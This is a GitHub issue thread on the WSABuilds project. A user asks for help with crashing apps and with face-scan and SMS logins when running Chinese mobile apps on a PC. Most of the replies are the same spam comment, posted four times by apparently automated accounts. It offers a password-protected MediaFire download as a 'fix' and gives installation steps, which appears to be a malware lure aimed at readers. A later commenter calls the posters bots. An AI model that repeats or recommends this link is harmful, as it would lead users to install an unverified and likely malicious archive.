### ISSUE TITLE
[REQUEST]Please look at me!!

### ISSUE THREAD

**Issue by Rookie-Adventures** [MustardChef/WSABuilds#436]
### Describe your request

It's funny to say that I barely have any code base, including you setting up questions, and I don't know how to answer them. But luckily I can try to make you understand through "natural language" (although I'm using translation),

I don't know why every time I install it, the device becomes a very strange thing. I'm not sure if it's my installation error or if it's because my display device is a 4K monitor

I'm not quite sure if I need which schemes because I don't know what they are, but my desire is to run all my apps on my PC, but there are some apps that they always stand <Crash>out of< Crash >< unresponsive>There are also apps that pause on a page or step, especially when it's time to scan your face.
Please don't doubt my ability to do illegal things, you should know how strict the procedures are in China, usually I only need SMS and face scanning on my mobile phone to complete the steps, after the PC runs it will become so complicated, login password/pin code/sms/face id/payment password/...

I swear I just want to use my app conveniently on my PC, but the problem is much more complicated than my brain, and there is nothing I can do about it, I can only ask you for help.
I sincerely pray to Scrooge McDuck that it will bless you with wealth

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Rookie-Adventures** [comment]
?

Krishlo ***@***.***>于2024年8月27日 周二12:10写道：

**Comment by Bonboon229** [comment]
I swear, these bots are getting stranger and stranger.
Close this "Issue" please.
